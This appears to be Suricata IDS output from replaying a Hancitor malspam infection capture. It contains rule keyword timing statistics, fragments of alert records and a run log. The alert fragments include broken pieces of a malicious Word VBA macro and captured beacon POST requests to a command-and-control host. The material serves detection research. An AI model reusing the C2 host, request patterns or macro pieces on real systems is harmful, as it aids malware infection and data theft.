  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          59226167        14904           4952            406200          3973.00         3692.00         4113.00        
  pcre             11349371        3413            2430            71755           3325.00         3254.00         3499.00        
  byte_test        976411          277             210             37670           3524.00         3738.00         2856.00        
  byte_jump        490145          135             3               33366           3630.00         3487.00         3633.00        
  isdataat         33705           12              0               2879            2808.00         0.00            2808.00        
  byte_extract     8297            2               2               4627            4148.00         4148.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: post-match
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  flowbits         35555           7               7               5857            5079.00         5079.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_uri
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          3077906         934             673             24567           3295.00         3371.00         3099.00        
  pcre             1716748         438             244             30974           3919.00         4008.00         3807.00        
  urilen           1175674         386             64              24339           3045.00         3024.00         3049.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_client_body
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          790729          242             0               10422           3267.00         0.00            3267.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_response_line
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          191720          66              0               3581            2904.00         0.00            2904.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: file_data
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          3435715         455             23              147525          7551.00         50536.00        5262.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          3171775         875             546             42393           3624.00         3762.00         3396.00        
  pcre             636781          129             66              19161           4936.00         5804.00         4027.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_header_names
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          1346286         390             259             31456           3452.00         3424.00         3506.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_accept
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  pcre             195378          59              0               4217            3311.00         0.00            3311.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_content_type
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          198822          59              59              15207           3369.00         3369.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_protocol
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          7362            2               2               3776            3681.00         3681.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_method
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          1788498         554             491             16975           3228.00         3229.00         3223.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_user_agent
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          370442          99              28              27653           3741.00         4582.00         3410.00        
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_host
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          3991            1               1               3991            3991.00         3991.00         0.00           
  --------------------------------------------------------------------------------------------------------------------------------
  Stats for: http_stat_code
  --------------------------------------------------------------------------------------------------------------------------------
  Keyword          Ticks           Checks          Matches         Max Ticks       Avg             Avg Match       Avg No Match   
  ---------------- --------------- --------------- --------------- --------------- --------------- --------------- --------------- 
  content          14457           4               4               4056            3614.00         3614.00         0.00           


unified2.alert.1550829399 - (6884 bytes)
[binary unified2 alert records; only the legible fragments of the captured packet payloads are kept below]
Screen … Coun… … Right_Character … TypeBackspace … Copy … End
Attribute VB_Name = "Module4"
Sub sdf()
Dim kk
kk … ChDir Environ("Temp") … Selection.TypeBackspace … FSO As Object … Create…("scripting.filesystemobject") … .copy Source:=… kk, Des… … UserForm1.TextBox
End Sub
Private Function …Base64(ByVal strData … String) … Byte … MSXML2.DOMDocument … "b64" … "bin.base64" … Nothing
Attribute VB_Name = "UserForm1"
{98364C7C-1C43-4B8C-B38E-16088EE523EE}{A6910E86-9090-42A7-B37F-F6DD97A1F358}
UserForm3 … ThisDocument … _VBA_PROJECT … PROJECT
GET / HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: api.ipify.org
Cache-Control: no-cache

POST /mlu/forum.php HTTP/1.0
Host: thenlorefuse.com
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 207
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)

POST /d2/about.php HTTP/1.0
Host: thenlorefuse.com
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 236
Content-Type: application/octet-stream
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Encoding: binary


IDSDeathBlossom.py.log - (1188 bytes)
2019-02-22 09:56:31,662 - INFO - __init__ - /opt/IDSDeathBlossom/IDSDeathBlossom.py +38 - DBType: MYSQL
2019-02-22 09:56:32,371 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +247 - Runmode set to run
2019-02-22 09:56:32,371 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +248 - Targets set to suricata-4.0.0-etopen-all
2019-02-22 09:56:32,372 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +320 - looping 1 times in runmode run
2019-02-22 09:56:32,372 - INFO - run - /opt/IDSDeathBlossom/IDSDeathBlossom.py +330 - run with success 0 out of 1
2019-02-22 09:56:32,372 - INFO - execute - /opt/IDSDeathBlossom/IDSDeathBlossom.py +207 - Executing: /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etopen/suricata400-etopen-all.yaml -l /var/www/html/90a60290858e08e0e9d5f7a4d55e5dabd2a6d3ad9c956d904083161fa55f2f7a -r /var/pcap/01282019.1218-2018-09-04-Hancitor-malspam-infection-traffic.pcap -vvv -k none
2019-02-22 09:56:41,118 - INFO - run_ids - /opt/IDSDeathBlossom/IDSDeathBlossom.py +244 - suricata ran successfully
2019-02-22 09:56:41,118 - INFO - <module> - /opt/IDSDeathBlossom/IDSDeathBlossom.py +275 - Total time for the idstool 9.46695995331